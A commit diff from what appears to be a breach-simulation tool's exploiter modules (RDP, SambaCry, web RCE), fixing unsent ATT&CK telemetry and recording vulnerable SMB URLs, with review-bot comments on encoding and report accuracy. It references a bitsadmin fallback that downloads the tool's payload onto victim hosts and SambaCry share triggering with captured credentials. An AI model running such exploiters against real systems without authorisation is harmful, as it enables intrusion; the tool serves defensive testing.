Merge branch 'attack_report' into brute_force_report

VakarisZ 2019-06-06 15:19:31 +03:00
commit 2ab3be6437
3 changed files with 8 additions and 3 deletions


@ -316,7 +316,7 @@ class RdpExploiter(HostExploiter):
if client_factory.success: if client_factory.success:
if not self._config.rdp_use_vbs_download: if not self._config.rdp_use_vbs_download:
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING) VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING).send()
self.add_vuln_port(RDP_PORT) self.add_vuln_port(RDP_PORT)
exploited = True exploited = True
self.report_login_attempt(True, user, password) self.report_login_attempt(True, user, password)
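Review bot: The technique id on the corrected `VictimHostTelem(...).send()` line is a bare string literal, and the same literal and call shape recur in the WebRCE section of this commit, so nothing tells a reader what the report entry means. I would add a comment above the call such as `# T1197 = MITRE ATT&CK "BITS Jobs": the payload was fetched with bitsadmin`, or hoist the id into a named module-level constant shared by both exploiters. The defect fixed here (a telemetry object built but never sent) failed silently, so a single shared call site would also make a repeat easier to spot. The enclosing method starts and ends outside the hunk.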


@ -82,7 +82,11 @@ class SambaCryExploiter(HostExploiter):
trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash']) trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash'])
if trigger_result is not None: if trigger_result is not None:
successfully_triggered_shares.append((share, trigger_result)) successfully_triggered_shares.append((share, trigger_result))
self.add_vuln_port(self.SAMBA_PORT) url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {'username': creds['username'],
'host': self.host.ip_addr,
'port': self.SAMBA_PORT,
'share_name': share}
self.add_vuln_url(url)
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share]) self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
for share, fullpath in successfully_triggered_shares: for share, fullpath in successfully_triggered_shares:
@ -92,6 +96,7 @@ class SambaCryExploiter(HostExploiter):
LOG.info( LOG.info(
"Shares triggered successfully on host %s: %s" % ( "Shares triggered successfully on host %s: %s" % (
self.host.ip_addr, str(successfully_triggered_shares))) self.host.ip_addr, str(successfully_triggered_shares)))
self.add_vuln_port(self.SAMBA_PORT)
return True return True
else: else:
LOG.info("No shares triggered successfully on host %s" % self.host.ip_addr) LOG.info("No shares triggered successfully on host %s" % self.host.ip_addr)
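Review bot: The `smb://` URL assembled in the first hunk interpolates `creds['username']` and `share` without percent-encoding, so a username like `DOMAIN\user` or a share name containing `/`, `@` or a space produces a value the report cannot split back into its parts unambiguously. Quote both components before formatting, for example `'username': quote(creds['username'], safe='')` and `'share_name': quote(share, safe='')`, using the standard library's URL quoting function. The share name presumably comes from the scanned host's own share listing, so it is remote-controlled text. If the report renders this URL as a link or as HTML, it is worth confirming that the rendering side escapes it. The enclosing method starts and ends outside both hunks.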


@ -307,7 +307,7 @@ class WebRCE(HostExploiter):
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp: if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
LOG.info("Powershell not found in host. Using bitsadmin to download.") LOG.info("Powershell not found in host. Using bitsadmin to download.")
backup_command = RDP_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path} backup_command = RDP_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path}
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING) VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING).send()
resp = self.exploit(url, backup_command) resp = self.exploit(url, backup_command)
return resp return resp
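Review bot: The T1197 telemetry on the `.send()` line goes out before `self.exploit(url, backup_command)` runs, so the attack report marks BITS Jobs as used even when the fallback command fails or is never executed on the host. Defenders reading the report to check their BITS-job detection coverage would then look for an event that may not exist. I would move the send below the call and gate it on the result, e.g. `resp = self.exploit(url, backup_command)` followed by `if resp: VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING).send()`. This assumes a falsy `resp` means failure, which the `isinstance(resp, bool)` check above suggests but the hunk does not show. The enclosing method starts outside the hunk.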